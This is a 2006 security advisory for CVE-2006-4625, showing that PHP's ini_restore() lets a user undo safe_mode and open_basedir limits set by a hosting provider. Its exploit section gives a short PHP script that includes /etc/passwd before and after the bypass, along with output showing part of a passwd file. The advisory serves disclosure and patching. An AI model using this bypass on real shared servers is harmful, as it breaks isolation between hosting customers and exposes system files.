-----BEGIN PGP SIGNED MESSAGE-----=0D
Hash: SHA1=0D
=0D
[PHP 5.1.6 / 4.4.4 Critical php_admin* bypass by ini_restore()]=0D
=0D
=0D
Author: Maksymilian Arciemowicz (cXIb8O3)=0D
Date:=0D
- - Written: 05.09.2006=0D
- - Public: 09.09.2006=0D
SecurityAlert Id: 42=0D
CVE: CVE-2006-4625=0D
SecurityRisk: High=0D
Affected Software: PHP 5.1.6 / 4.4.4 < = x=0D
Advisory URL: http://securityreason.com/achievement_securityalert/42=0D
Vendor: http://www.php.net=0D
=0D
- --- 0.Description ---=0D
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific =0D
features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.=0D
=0D
A nice introduction to PHP by Stig S=E6ther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much =0D
of the PHP Conference Material is freely available. =0D
=0D
php_admin_value name value=0D
=0D
Sets the value of the specified directive. This can not be used in .htaccess files. Any directive type set with php_admin_value can =0D
not be overridden by .htaccess or virtualhost directives. To clear a previously set value use none as the value. =0D
php_admin_flag name on|off=0D
=0D
Used to set a boolean configuration directive. This can not be used in .htaccess files. Any directive type set with php_admin_flag =0D
can not be overridden by .htaccess or virtualhost directives. =0D
=0D
http://pl.php.net/manual/en/configuration.changes.php=0D
=0D
- --- 1. php_admin_value and php_admin_flag Bypass ---=0D
When using PHP as an Apache module, you can also change the configuration settings using directives in Apache configuration files (e.g. =0D
httpd.conf). This options are using by a lot of ISP to set open_basedir, safe_mode and more options.=0D
=0D
For example:=0D
open_basedir in httpd.conf=0D
=0D
- ---=0D
=0D
Options FollowSymLinks MultiViews Indexes=0D
AllowOverride None=0D
php_admin_flag safe_mode 1=0D
php_admin_value open_basedir /usr/home/frajer/public_html/=0D
=0D
- ---=0D
=0D
In PHP are two config options. Are Local Value and Master Value. More in phpinfo() or ini_get() =0D
=0D
Example:=0D
If you have safe_mode or open_basedir (etc) set in Local Value for selected users and in Master Value is default value, you can restore =0D
Master Value to Local Value per ini_restore() function!=0D
=0D
- ---=0D
ini_restore=0D
=0D
(PHP 4, PHP 5)=0D
ini_restore -- Restores the value of a configuration option=0D
- ---=0D
=0D
Restores the value of a php.ini file. Then your PHP options from httpd.conf are bypassed.=0D
=0D
EXPLOIT:=0D
- ---=0D
=0D
echo ini_get("safe_mode");=0D
echo ini_get("open_basedir");=0D
include("/etc/passwd");=0D
ini_restore("safe_mode");=0D
ini_restore("open_basedir");=0D
echo ini_get("safe_mode");=0D
echo ini_get("open_basedir");=0D
include("/etc/passwd");=0D
?>=0D
- ---=0D
=0D
RESULT OF EXPLOIT:=0D
- ---=0D
1=0D
/usr/home/frajer/public_html/=0D
Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): =0D
(/usr/home/frajer/public_html/) in /usr/home/frajer/public_html/ini_restore.php on line 4=0D
=0D
Warning: include(/etc/passwd) [function.include]: failed to open stream: Operation not permitted in =0D
/usr/home/frajer/public_html/ini_restore.php on line 4=0D
=0D
Warning: include() [function.include]: Failed opening '/etc/passwd' for inclusion (include_path='.:') in =0D
/usr/home/frajer/public_html/ini_restore.php on line 4=0D
# $BSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-ag.....=0D
- ---=0D
=0D
This issue is very dangerous, because Admin can't correct set open_basedir or safe_mode for all users.=0D
=0D
- --- 2. How to fix ---=0D
fixed in CVS HEAD, PHP_5_2, PHP_5_1 and PHP_4_4.=0D
=0D
http://cvs.php.net/viewcvs.cgi/php-src/NEWS=0D
=0D
- --- 3. Greets ---=0D
=0D
For: sp3x=0D
and=0D
p_e_a, l5x=0D
=0D
- --- 4. Contact ---=0D
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]=0D
Email: cxib [at] securityreason [dot] com=0D
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg=0D
=0D
Regards =0D
SecurityReason=0D
-----BEGIN PGP SIGNATURE-----=0D
Version: GnuPG v1.4.2.2 (FreeBSD)=0D
=0D
iD8DBQFFApZZ3Ke13X/fTO4RAmA4AJ9g4rA0hqST7Px7i03RGpE1bmZmrgCgmt0a=0D
SvP3KPhmLtZcCNFmtGa8oJ8==0D
=bqQV=0D
-----END PGP SIGNATURE-----=0D